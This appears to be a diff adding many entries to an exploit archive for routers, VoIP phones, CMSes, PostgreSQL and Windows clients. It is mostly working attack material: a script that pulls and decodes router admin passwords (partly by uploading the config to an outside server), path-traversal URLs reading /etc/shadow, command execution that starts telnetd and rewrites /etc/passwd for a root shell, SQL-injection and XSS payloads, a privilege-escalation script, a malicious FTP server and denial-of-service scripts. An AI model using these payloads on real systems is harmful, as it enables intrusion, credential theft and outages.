def decodePasswordRemote(host):
fname = 'rom-0'
if os.path.isfile(fname) == True:
os.remove(fname)
urllib.urlretrieve ("http://"+host+"/rom-0", fname)
# If this URL goes down you might have to find one and change this function.
# You can also use the local decoder. It might have few errors in getting output.
url = 'http://198.61.167.113/zynos/decoded.php' # Target URL
files = {'uploadedfile': open('rom-0', 'rb') } # The rom-0 file we wanna upload
data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # Additional Parameters we need to include
headers = { 'User-agent' : 'Python Demo Agent v1' } # Any additional Headers you want to send or include
res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False )
res1 =res.content
p = re.search('rows=10>(.*)', res1)
if p:
passwd = found = p.group(1)
else:
password = 'NotFound'
return passwd
def decodePasswordLocal(host):
# Sometimes this might output a wrong password while finding the exact string.
# print the result as mentioned below and manually find out
fname = 'rom-0'
if os.path.isfile(fname) == True:
os.remove(fname)
urllib.urlretrieve ("http://"+host+"/rom-0", fname)
fpos=8568
fend=8788
fhandle=file('rom-0')
fhandle.seek(fpos)
chunk="*"
amount=221
while fpos < fend:
if fend-fpos < amount:
amount = amount
data = fhandle.read(amount)
fpos += len(data)
reader = BitReader(data)
result = ''
window = RingList(2048)
while True:
bit = reader.getBit()
if not bit:
char = reader.getByte()
result += chr(char)
window.append(char)
else:
bit = reader.getBit()
if bit:
offset = reader.getBits(7)
if offset == 0:
break
else:
offset = reader.getBits(11)
lenField = reader.getBits(2)
if lenField < 3:
lenght = lenField + 2
else:
lenField <<= 2
lenField += reader.getBits(2)
if lenField < 15:
lenght = (lenField & 0x0f) + 5
else:
lenCounter = 0
lenField = reader.getBits(4)
while lenField == 15:
lenField = reader.getBits(4)
lenCounter += 1
lenght = 15*lenCounter + 8 + lenField
for i in xrange(lenght):
char = window[-offset]
result += chr(char)
window.append(char)
result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')
# In case the password you see is wrong while filtering, manually print it from here and findout.
#print result
if 'TP-LINK' in result:
result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';
result = result.replace("TP-LINK", "")
result = result[1:]
if 'ZTE' in result:
result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';
result = result.replace("ZTE", "")
result = result[1:]
if 'tc160' in result:
result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';
result = result.replace("tc160", "")
result = result[1:]
return result
def regex(path, text):
match = re.search(path, text)
if match:
return match.group()
else:
return None
def main():
if sys.platform == 'win32':
os.system('cls')
else:
os.system('clear')
try:
print banner()
print '''
|=--------=[ ZTE and TP-Link RomPager Denial of Service Exploit ]=-------=|\n
[*] Author: Osanda Malith Jayathissa
[*] Follow @OsandaMalith
[!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
[!] Author takes no responsibility for any kind of damage you cause.
'''
parser = optparse.OptionParser("usage: %prog -i <IP Address> ")
parser.add_option('-i', dest='host',
type='string',
help='Specify the IP to attack')
(options, args) = parser.parse_args()
if options.host is None:
parser.print_help()
exit(-1)
host = options.host
x = checkHost(host)
if x == 0:
print '[+] The host is up and running'
server = checkServer(host)
if server == 0:
checkPassword(host)
else:
print ('[!] Sorry the router is not running RomPager')
else:
print '[!] The host is not up and running'
sys.exit(0)
except KeyboardInterrupt:
print '[!] Ctrl + C detected\n[!] Exiting'
sys.exit(0)
except EOFError:
print '[!] Ctrl + D detected\n[!] Exiting'
sys.exit(0)
if __name__ == "__main__":
main()
#EOF

21
platforms/hardware/remote/33739.txt Executable file
View file

@ -0,0 +1,21 @@
Title: Yealink VoIP Phone SIP-T38G Default Credentials
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5755
Description:
Web interface use hardcoded default credential in /config/.htpasswd
user:s7C9Cx.rLsWFA admin:uoCbM.VEiKQto var:jhl3iZAe./qXM
Here's the cleartext password for these accounts:
user:user
admin:admin
var:var
--
*Mr.Un1k0d3r** or 1 #*

23
platforms/hardware/remote/33740.txt Executable file
View file

@ -0,0 +1,23 @@
Title: Yealink VoIP Phone SIP-T38G Local File Inclusion
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5756, CVE-2013-5757
Description:
Web interface contain a vulnerability that allow any page to be included.
We are able to disclose /etc/passwd & /etc/shadow
POC:
Using the page parameter (CVE-2013-5756):
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
Using the command parameter (CVE-2013-5757):
http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")
*By viewing the shadow file we are able to conclude that cgiServer.exx run
under the root privileges. This lead to CVE-2013-5759.

29
platforms/hardware/remote/33741.txt Executable file
View file

@ -0,0 +1,29 @@
Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758
Description:
Using cgiServer.exx we are able to send OS command using the system
function.
POC:
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
system("/bin/busybox%20telnetd%20start")
--
*Mr.Un1k0d3r** or 1 #*

54
platforms/hardware/remote/33742.txt Executable file
View file

@ -0,0 +1,54 @@
Title: Yealink VoIP Phone SIP-T38G Privileges Escalation
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5759
Description:
Using the fact that cgiServer.exx run under the root privileges we use the
command execution (CVE-2013-5758) to modify the system file restriction.
Then we add extra privileges to the guest account.
POC:
Step 1 - Changing /etc folder right to 777:
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
system("/bin/busybox%20chmod%20-R%20777%20/etc")
Step 2 - Change guest user uid:
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
system("echo "root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:0:0:Guest,,,:/:/bin/sh\" > /etc/passwd
")
Step 3 - Connect back using telnet and guest account (password is guest):
# id
uid=0(root) gid=0(root)
Enjoy your root shell :)
--
*Mr.Un1k0d3r** or 1 #*

40
platforms/multiple/dos/33729.txt Executable file
View file

@ -0,0 +1,40 @@
source: http://www.securityfocus.com/bid/38619/info
PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before using it in memory-allocation calculations.
An attacker can exploit this issue to cause the affected application to crash. Due to the nature of this issue, remote code execution may be possible; this has not been confirmed.
SELECT * from B AS alias0 LEFT JOIN BB AS alias1 LEFT JOIN B
AS alias2 LEFT JOIN A AS alias3 LEFT JOIN AA AS alias4 LEFT JOIN B
AS alias5 ON alias4.int_key = alias5.int_key ON alias3.int_key =
alias4.int_key LEFT JOIN AA AS alias6 LEFT JOIN A AS alias7 ON
alias6.int_key = alias7.int_key LEFT JOIN BB AS alias8 ON alias7.int_key
= alias8.int_key ON alias3.int_key = alias8.int_key LEFT JOIN AA AS
alias9 ON alias6.int_key = alias9.int_key ON alias2.int_key =
alias8.int_key LEFT JOIN BB AS alias10 LEFT JOIN AA AS alias11 LEFT
JOIN B AS alias12 ON alias11.int_key = alias12.int_key ON alias10.int_key
= alias11.int_key ON alias9.int_key = alias10.int_key ON alias1.int_key =
alias8.int_key LEFT JOIN BB AS alias13 LEFT JOIN A AS alias14
LEFT JOIN AA AS alias15 LEFT JOIN A AS alias16 ON alias15.int_key =
alias16.int_key LEFT JOIN B AS alias17 ON alias15.int_key =
alias17.int_key ON alias14.int_key = alias16.int_key LEFT JOIN AA AS
alias18 ON alias14.int_key = alias18.int_key LEFT JOIN B AS alias19 ON
alias15.int_key = alias19.int_key LEFT JOIN AA AS alias20 ON
alias16.int_key = alias20.int_key ON alias13.int_key = alias19.int_key
LEFT JOIN A AS alias21 ON alias13.int_key = alias21.int_key ON
alias3.int_key = alias17.int_key LEFT JOIN B AS alias22 ON alias7.int_key
= alias22.int_key LEFT JOIN A AS alias23 ON alias20.int_key =
alias23.int_key LEFT JOIN A AS alias24 ON alias14.int_key =
alias24.int_key LEFT JOIN BB AS alias25 LEFT JOIN BB AS alias26 ON
alias25.int_key = alias26.int_key LEFT JOIN A AS alias27 LEFT JOIN
A AS alias28 ON alias27.int_key = alias28.int_key LEFT JOIN B AS alias29
LEFT JOIN BB AS alias30 LEFT JOIN B AS alias31 LEFT JOIN A AS
alias32 LEFT JOIN B AS alias33 ON alias32.int_key = alias33.int_key LEFT
JOIN A AS alias34 ON alias32.int_key = alias34.int_key ON alias31.int_key
= alias33.int_key ON alias30.int_key = alias33.int_key ON alias29.int_key
= alias34.int_key ON alias27.int_key = alias34.int_key LEFT JOIN AA AS
alias35 LEFT JOIN A AS alias36 ON alias35.int_key = alias36.int_key ON
alias34.int_key = alias36.int_key LEFT JOIN A AS alias37 ON
alias33.int_key = alias37.int_key ON alias25.int_key = alias32.int_key
LEFT JOIN A AS alias38 ON alias37.int_key = alias38.int_key ON
alias15.int_key = alias37.int_key ON alias0.int_key = alias9.int_key

12
platforms/multiple/dos/33735.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/38645/info
SUPERAntiSpyware and Super Ad Blocker are prone to multiple local vulnerabilities, including:
- Multiple denial-of-service vulnerabilities
- Multiple local privilege-escalation vulnerabilities
- A security vulnerability that may allow attackers to read and write arbitrary files
- An information-disclosure vulnerability
An attacker can exploit these issues to gain elevated privileges on the affected computer, crash the affected computer, gain access to sensitive information, or overwrite arbitrary files. Other attacks are also possible.
http://www.exploit-db.com/sploits/33735.zip

12
platforms/multiple/webapps/33731.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/38634/info
Friendly Technologies TR-069 ACS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, gain administrator access, access or modify data, or exploit latent vulnerabilities in the underlying database.
Friendly Technologies TR-069 ACS 2.8.9 is vulnerable; other versions may also be affected.
The following example data is available:
Username: ' or 1=1--
Password: ' or 1=1--

9
platforms/php/dos/33677.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38430/info
PHP is prone to a security vulnerability that affects LCG (Linear Congruential) entropy.
Attackers can exploit this issue to steal sessions or other sensitive data.
Versions prior to PHP 5.2.13 are affected.
http://www.exploit-db.com/sploits/33677.tar.gz

15
platforms/php/webapps/33714.txt Executable file
View file

@ -0,0 +1,15 @@
# Exploit Title: SHOUTcast DNAS v2.2.1 win32 XSS\HTML Injection in Song history  (other version may be also affected)
# Date: 2014-06-11 
# Exploit Author: robercik101
# Vendor Homepage: http://www.shoutcast.com/ ?t=373139
# Software Link: http://forums.winamp.com/showthread.php?t=373139
# Version: 2.2.1 for Win32
# Tested on: Windows 8.1
There is an XSS\HTML Injection in a song history in song history, allowing inject a JavaScript script or HTML code in site.
PoC:
1. Open yours MP3 file setting, and open details overlap.
2. In the title field enter your HTML code
3. Start streaming your MP3 file via Winamp with SHOUTcast Source DSP 
4. Open your SHOUTcast page (default: localhost:8000) in your favourite Internet browser, login to server (if it needed) and open Song history.
And it is all
http://robercik101.tk

14
platforms/php/webapps/33726.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/38608/info
TikiWiki is prone to multiple vulnerabilities, including:
- An SQL-injection vulnerability
- An unspecified authentication-bypass vulnerability
- An unspecified vulnerability
Exploiting these issues could allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and gain unauthorized access to the affected application. Other attacks are also possible.
Versions prior to TikiWiki 4.2 are vulnerable.
http://www.example.com/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_users(email,login,password,hash) VALUES ('','bad_guy','lsjfsofasgfs',md5('lsjfsofasgfslsjfsofasgfs'));;--&search=>>
http://www.example.com/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_usergroups (`userId`, `groupName`) VALUES([user_id],'Admins');;--&search=>>

12
platforms/php/webapps/33727.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/38610/info
wh-em.com upload is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
wh-em.com upload 7.0 is vulnerable; other versions may also be affected.
The following example data is available:
javascript:document.cookie="whem_Name=adm_user;path=/";
javascript:document.cookie="whem_Password=adm_user;path=/";

58
platforms/php/webapps/33732.txt Executable file
View file

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/38637/info
60cycleCMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
http://www.example.com/60cycleCMS/private/select.php?act=edit
POST /60cyclecms/private/preview.php HTTP/1.1
Host: demo.opensourcecms.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.example.com/60cyclecms/private/edit.php
Cookie: __utma=87180614.1562082400.1268211497.1268211497.1268211497.1; __utmb=87180614.6.10.1268211497; __utmc=87180614; __utmz=87180614.1268211497.1.1.utmcsr=php.opensourcecms.com|utmccn=(referral)|utmcmd=referral|utmcct=/scripts/details.php; PHPSESSID=f6e21193e32af41e62a0c82a839d3a1e
Authorization: Basic YWRtaW46ZGVtbzEyMw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
title="><script>alert("XSS")</script>&body="><script>alert("XSS")</script>&time=&timezone=
<html>
<body>
<h2>Post Preview:</h2>
<form action="" method="post">
<input type="button" value="Edit Post" onclick="submitForm(this)">
<input type="button" value="Submit Post" onclick="submitForm(this)">
</form>
<script type="text/javascript">
function submitForm(button)
{
if (button.value == "Edit Post")
button.form.action = "edit.php";
else
button.form.action = "submit.php";
button.form.submit();
}
</script>
<h2 class="lonelyPost"><a class="titleLink" href="#">"><script>alert("XSS")</script></a></h2><h4>Thursday, January 1, 1970 - 12:00 am</h4><p>"><script>alert("XSS")</script></p></body>
</html>

9
platforms/php/webapps/33734.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38643/info
DDL CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DDL CMS 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/ddl/blacklist.php?site_name=[XSS]

53
platforms/php/webapps/33743.py Executable file
View file

@ -0,0 +1,53 @@
import sys,getopt,cookielib,urllib2,urllib
# ZeroCMS 1.0
# zero_transact_user.php
# Impropper Form post hanling, (parameter polution)
# Vendor: Another Awesome Stuff
# Product web page: http://www.aas9.in/zerocms/
# author: tiago.alexand@gmail.com
# Tested on: php 5.4.27
# OSVDB ID: 108025
# description
# Summary: ZeroCMS is a very simple Content Management
# System built using PHP and MySQL.
# the script zero_transact_user.php contains a Modify Account case
# where the execution context doen't have in to consideration the current user's permitions
# allowing a malcious user to escalate its privileges to admin.
def exploit(host,email,name,userid):
access_level = 3 # default for admin
url = host + '/zero_transact_user.php' #the script handles user related actions
args = { 'user_id':userid,'email':email, 'name':name,'access_level':access_level,'action':'Modify Account' }
data = urllib.urlencode(args)
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
response = opener.open(url,data);
print response.read()
def main(argv):
host = ''
email = ''
accountname = ''
userid = ''
try:
opts, args = getopt.getopt(argv,"hu:m:n:i:")
except getopt.GetoptError:
print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
sys.exit()
elif opt in ("-u"):
host = arg
elif opt in ("-m"):
email = arg
elif opt in ("-n"):
accountname = arg
elif opt in ("-i"):
userid = arg
exploit(host,email,accountname,userid)
if __name__ == "__main__":
main(sys.argv[1:])

9
platforms/windows/dos/33710.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38566/info
J. River Media Jukebox is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Media Jukebox 12 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/33710.mp3

9
platforms/windows/dos/33711.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38568/info
BS.Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
BS.Player 2.51 Build 1022 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/33711.mp3

121
platforms/windows/dos/33713.py Executable file
View file

@ -0,0 +1,121 @@
#-----------------------------------------------------------------------------#
# Exploit Title: Core FTP LE 2.2 - Heap Overflow PoC #
# Date: Jun 11 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.coreftp.com/ #
# Version: 2.2 build 1798 #
# Tested on: Windows XP SP3 #
#-----------------------------------------------------------------------------#
# In some cases the client does not do proper bounds checking on server
# responses. An overly long reply from the server causes a heap overflow and
# crashes the application. The USER, PASS, PASV, SYST, PWD, CDUP commands are
# all vulnerable and possibly other commands are too.
'''
HEAP[coreftp.exe]: Heap block at 00F17BC8 modified at 00F1BBD1 past requested size of 4001
(9d8.9f4): Break instruction exception - code 80000003 (first chance)
eax=00f17bc8 ebx=00f1bbd1 ecx=7c91eab5 edx=015295ab esi=00f17bc8 edi=00004001
eip=7c90120e esp=015297ac ebp=015297b0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc int 3
0:002> dd eax
00f17bc8 004b0804 011f0733 20373232 41414141
00f17bd8 41414141 41414141 41414141 41414141
00f17be8 41414141 41414141 41414141 41414141
00f17bf8 41414141 41414141 41414141 41414141
00f17c08 41414141 41414141 41414141 41414141
00f17c18 41414141 41414141 41414141 41414141
00f17c28 41414141 41414141 41414141 41414141
00f17c38 41414141 41414141 41414141 41414141
0:002> g
HEAP[coreftp.exe]: Invalid Address specified to RtlFreeHeap( 00C10000, 00F17BD0 )
(9d8.9f4): Break instruction exception - code 80000003 (first chance)
eax=00f17bc8 ebx=00f17bc8 ecx=7c91eab5 edx=015295ba esi=00c10000 edi=00f17bc8
eip=7c90120e esp=015297c4 ebp=015297c8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc int 3
0:002> g
(9d8.9f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f3bff0 ebx=00000000 ecx=41414141 edx=00f1bbf0 esi=00f3bfe8 edi=00c10000
eip=7c9276dc esp=01529704 ebp=015297d8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlOemStringToUnicodeString+0x277:
7c9276dc 8901 mov dword ptr [ecx],eax ds:0023:41414141=????????
0:002> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlOemStringToUnicodeString+0x0000000000000277 (Hash=0x72683756.0x417d7f55)
User mode write access violations that are not near NULL are exploitable.
(b58.cf0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f1bbf0 ebx=41414141 ecx=00004141 edx=00c10608 esi=00f1bbe8 edi=41414141
eip=7c919064 esp=0152d30c ebp=0152d528 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
ntdll!RtlDosSearchPath_Ustr+0x473:
7c919064 8b0b mov ecx,dword ptr [ebx] ds:0023:41414141=????????
0:002> dd eax
00f1bbf0 41414141 41414141 41414141 41414141
00f1bc00 41414141 41414141 41414141 41414141
00f1bc10 41414141 41414141 41414141 41414141
00f1bc20 41414141 41414141 41414141 41414141
00f1bc30 41414141 41414141 41414141 41414141
00f1bc40 41414141 41414141 41414141 41414141
00f1bc50 41414141 41414141 41414141 41414141
00f1bc60 41414141 41414141 41414141 41414141
0:002> dd esi
00f1bbe8 41414141 41414141 41414141 41414141
00f1bbf8 41414141 41414141 41414141 41414141
00f1bc08 41414141 41414141 41414141 41414141
00f1bc18 41414141 41414141 41414141 41414141
00f1bc28 41414141 41414141 41414141 41414141
00f1bc38 41414141 41414141 41414141 41414141
00f1bc48 41414141 41414141 41414141 41414141
00f1bc58 41414141 41414141 41414141 41414141
'''
#!/usr/bin/python
from socket import *
host = "0.0.0.0"
port = 21
payload = "A" * 150000
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, 21))
s.listen(1)
print "[+] Evil FTP Server started"
print "[+] Listening on port %d..." % port
conn, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
conn.send("220 Welcome to Evil FTP Server\r\n")
conn.recv(1024) # Receive USER
conn.send("331 Need password for whatever user\r\n")
conn.recv(1024) # Receive PASS
conn.send("230 User logged in\r\n")
conn.recv(1024) # Receive SYST
conn.send("215 UNIX Type: L8\r\n")
conn.recv(1024) # Receive PWD
conn.send("257 \"/\" is current directory\r\n")
try:
print "[+] Sending evil response for 'PASV' command..."
conn.recv(1024) # Receive PASV
conn.send("227 "+payload+"\r\n")
conn.recv(1024)
except error as e:
if e.errno == 10054:
print "[+] Client crashed!"
else:
print e
finally:
conn.close()
s.close()

62
platforms/windows/dos/33733.pl Executable file
View file

@ -0,0 +1,62 @@
source: http://www.securityfocus.com/bid/38638/info
The 'httpdx' program is prone to a denial-of-service vulnerbaility.
Remote attackers can exploit this issue to cause the server to stop responding, denying service to legitimate users.
This issue affects httpdx 1.5.3; other versions may also be affected.
#!/usr/bin/perl
#
# Program : Httpdx v1.5.3
# PoC : Remote Break Services
# Homepage : http://sourceforge.net/projects/httpdx/
# Found by : Jonathan Salwan
# This Advisory : Jonathan Salwan
# Contact : submit@shell-storm.org
#
#
# //----- Application description
#
# Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs
# with only few threads. Includes directory listing, virtual hosting, basic auth., support
# for PHP, Perl, Python, SSI, etc. All settings in one config/script file.
#
#
# //----- Description of vulnerability
#
# The vulnerability is caused due to an input validation error when processing HTTP requests. This can be
# exploited to break all services http & ftp.
#
#
#
# //----- Credits
#
# http://www.shell-storm.org <submit@shell-storm.org>
#
#
use IO::Socket;
print "\n[x]Httpdx v1.5.3 - Remote Break Services\n";
if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 127.0.0.1 80\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";
print "[+] Sending request: GET /res~httpdx.conf/image/php.png HTTP/1.1\\r\\nHost: $ip\\r\\n\\r\\n";
$msg = "GET /res~httpdx.conf/image/php.png HTTP/1.1\r\nHost: $ip\r\n\r\n";
$socket->send($msg);
print "\n[+] Done.\n\n";
close($socket);

11
platforms/windows/remote/33705.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/38544/info
The CSS Web Installer ActiveX control in Authentium Command On Demand Online scanner is prone to multiple buffer-overflow vulnerabilities.
An attacker can exploit these issues by enticing a victim to view a malicious webpage. Successful exploits will allow the attacker to execute arbitrary code within the context of the application that uses the ActiveX control (typically Internet Explorer). Failed exploit attempts will result in a denial-of-service condition.
Command On Demand CSS Web Installer ActiveX 1.4.9508.605 is vulnerable; other versions may also be affected.
Note: Reports indicate that the vendor no longer supports this product; vendor patches are not expected to be released.
http://www.exploit-db.com/sploits/33705.zip

7
platforms/windows/remote/33707.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38549/info
Orb Networks Orb is prone to a denial-of-service vulnerability when handling malformed '.mp3' files.
Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
http://www.exploit-db.com/sploits/33707.zip

9
platforms/windows/remote/33712.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38569/info
VLC Media Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
VLC Media Player 1.0.5 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/33712.mp3